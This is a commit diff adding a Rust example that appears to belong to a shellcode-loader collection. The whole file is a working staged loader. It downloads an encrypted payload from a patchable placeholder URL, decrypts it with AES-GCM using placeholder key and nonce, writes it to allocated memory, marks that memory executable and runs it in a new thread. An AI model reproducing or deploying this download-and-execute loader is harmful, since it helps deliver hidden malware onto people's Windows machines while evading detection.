example: add create_thread_remote

examples/create_thread_remote/Cargo.toml

@@ -0,0 +1,11 @@
+[package]
+name = "create_thread"
+version = "0.1.0"
+edition = "2021"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+windows-sys = { version = "0.48.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_Security"] }
+aes-gcm = "0.10.3"
+reqwest = { version = "0.12.5", features = ["blocking"] }

examples/create_thread_remote/src/main.rs

@@ -0,0 +1,66 @@
+use aes_gcm::aead::Aead;
+use aes_gcm::{Aes256Gcm, KeyInit, Nonce};
+use std::ffi::CStr;
+use std::mem::transmute;
+use std::ptr::{copy, null, null_mut};
+use windows_sys::Win32::Foundation::{GetLastError, FALSE, WAIT_FAILED};
+use windows_sys::Win32::System::Memory::{
+    VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,
+};
+use windows_sys::Win32::System::Threading::{CreateThread, WaitForSingleObject};
+
+fn decrypt(data: &[u8]) -> Vec<u8> {
+    const KEY: &[u8; 32] = b"$$KKKKKKKKKKKKKKKKKKKKKKKKKKKK$$";
+    const NONCE: &[u8; 12] = b"$$NNNNNNNN$$";
+
+    let aes = Aes256Gcm::new_from_slice(KEY).unwrap();
+    let nonce = Nonce::from_slice(NONCE);
+    aes.decrypt(nonce, data).unwrap()
+}
+
+fn download() -> Vec<u8> {
+    const URL: &[u8; 81] =
+        b"$$UURRLL$$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
+    let url = CStr::from_bytes_until_nul(URL).unwrap();
+    reqwest::blocking::get(url.to_str().unwrap())
+        .unwrap()
+        .bytes()
+        .unwrap()
+        .to_vec()
+}
+
+#[cfg(target_os = "windows")]
+fn main() {
+    let shellcode = download();
+    let shellcode = shellcode.as_slice();
+    let shellcode = decrypt(shellcode);
+    let shellcode_size = shellcode.len();
+
+    unsafe {
+        let addr = VirtualAlloc(
+            null(),
+            shellcode_size,
+            MEM_COMMIT | MEM_RESERVE,
+            PAGE_READWRITE,
+        );
+        if addr.is_null() {
+            panic!("[-]VirtualAlloc failed: {}!", GetLastError());
+        }
+
+        copy(shellcode.as_ptr(), addr.cast(), shellcode_size);
+
+        let mut old = PAGE_READWRITE;
+        let res = VirtualProtect(addr, shellcode_size, PAGE_EXECUTE, &mut old);
+        if res == FALSE {
+            panic!("[-]VirtualProtect failed: {}!", GetLastError());
+        }
+
+        let addr = transmute(addr);
+        let thread = CreateThread(null(), 0, addr, null(), 0, null_mut());
+        if thread == 0 {
+            panic!("[-]CreateThread failed: {}!", GetLastError());
+        }
+
+        WaitForSingleObject(thread, WAIT_FAILED);
+    }
+}